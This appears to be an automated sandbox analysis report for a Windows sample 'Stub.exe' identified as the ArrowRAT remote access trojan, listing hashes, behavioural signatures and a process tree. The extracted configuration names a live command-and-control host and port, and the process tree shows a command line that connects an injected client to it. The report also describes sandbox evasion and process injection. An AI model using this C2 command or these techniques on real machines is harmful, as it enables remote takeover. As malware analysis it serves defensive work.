Overview

overview

10

Static

static

10

Stub.exe

windows7-x64

10

Stub.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2022 16:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Stub.exe

  • Size

    155KB

  • MD5

    27055f0656283c1bcdafec2beeee39d5

  • SHA1

    06947c8acfcc7fa067e761ba76d2ef250fba97ad

  • SHA256

    fb48bb91678c696679b72b046aa24ecddb98c4ccf65d068393cdb722cdba8caa

  • SHA512

    0ae5ed68882e75ed59ecf0cccd3cfaf7ae40add418416bdc5659b02bac33c872884ccd63d6be7912ba976af6e8ae4e5ee09937afcf8b23d8675b40f8ff7447cc

  • SSDEEP

    3072:zbRH2+0nmBELlEGXsy1UvVeB04aIcwIlq3Ttmbo868Y:zbRL0nNJn8y+VeBO9l0TtmboT8

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

pdra.duckdns.org:5788

Mutex

VtREmXzYA

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 56 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stub.exe
    "C:\Users\Admin\AppData\Local\Temp\Stub.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1044
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client pdra.duckdns.org 5788 VtREmXzYA
      2⤵
        PID:5032
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client pdra.duckdns.org 5788 VtREmXzYA
        2⤵
          PID:4356
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:2256
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:3296

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/808-132-0x0000018BE54A0000-0x0000018BE54CC000-memory.dmp

        Filesize

        176KB

        Download

      • memory/808-134-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/808-166-0x00007FFD10110000-0x00007FFD10BD1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3296-158-0x0000015AB600D000-0x0000015AB6010000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-157-0x0000015AB600D000-0x0000015AB6010000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-176-0x0000015AB6032000-0x0000015AB6035000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-147-0x0000015AB3F10000-0x0000015AB3F30000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3296-175-0x0000015AB6032000-0x0000015AB6035000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-174-0x0000015AB6032000-0x0000015AB6035000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-171-0x0000015AB602E000-0x0000015AB6032000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-156-0x0000015AB600D000-0x0000015AB6010000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-155-0x0000015AB600D000-0x0000015AB6010000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3296-168-0x0000015AB602E000-0x0000015AB6032000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-170-0x0000015AB602E000-0x0000015AB6032000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-160-0x0000015AB6012000-0x0000015AB6016000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-161-0x0000015AB6012000-0x0000015AB6016000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-162-0x0000015AB6012000-0x0000015AB6016000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-163-0x0000015AB6012000-0x0000015AB6016000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-164-0x0000015AB6012000-0x0000015AB6016000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3296-169-0x0000015AB602E000-0x0000015AB6032000-memory.dmp

        Filesize

        16KB

        Download

      • memory/4356-154-0x0000000006130000-0x0000000006180000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4356-135-0x0000000000400000-0x0000000000418000-memory.dmp

        Filesize

        96KB

        Download

      • memory/4356-137-0x0000000005040000-0x00000000050D2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4356-153-0x0000000005E10000-0x0000000005E76000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4356-150-0x0000000005860000-0x0000000005E04000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4356-138-0x00000000050E0000-0x000000000517C000-memory.dmp

        Filesize

        624KB

        Download